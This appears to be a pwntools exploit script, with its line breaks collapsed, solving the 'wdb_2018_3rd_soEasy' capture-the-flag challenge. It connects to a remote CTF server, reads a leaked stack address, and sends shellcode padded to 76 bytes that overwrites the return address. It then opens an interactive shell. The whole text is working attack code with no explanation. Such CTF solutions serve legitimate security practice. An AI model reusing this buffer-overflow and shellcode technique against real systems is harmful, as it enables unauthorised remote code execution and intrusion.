
#coding=utf8from pwn import *from LibcSearcher import*context.log_level = 'debug'#context.arch='amd64'io =process('./wdb_2018_3rd_soEasy')elf = ELF('./wdb_2018_3rd_soEasy')#libc = ELF('libc-2.23.so')io =remote('node4.buuoj.cn',28547)io.recvuntil("Hei,give you a gift->")addr = int(io.recv(10),16)print("addr-------------->"+hex(addr))shellcode = asm(shellcraft.sh())payload = shellcodepayload = payload.ljust(76,b"\x00")payload +=p32(addr)io.send(payload)io.interactive()
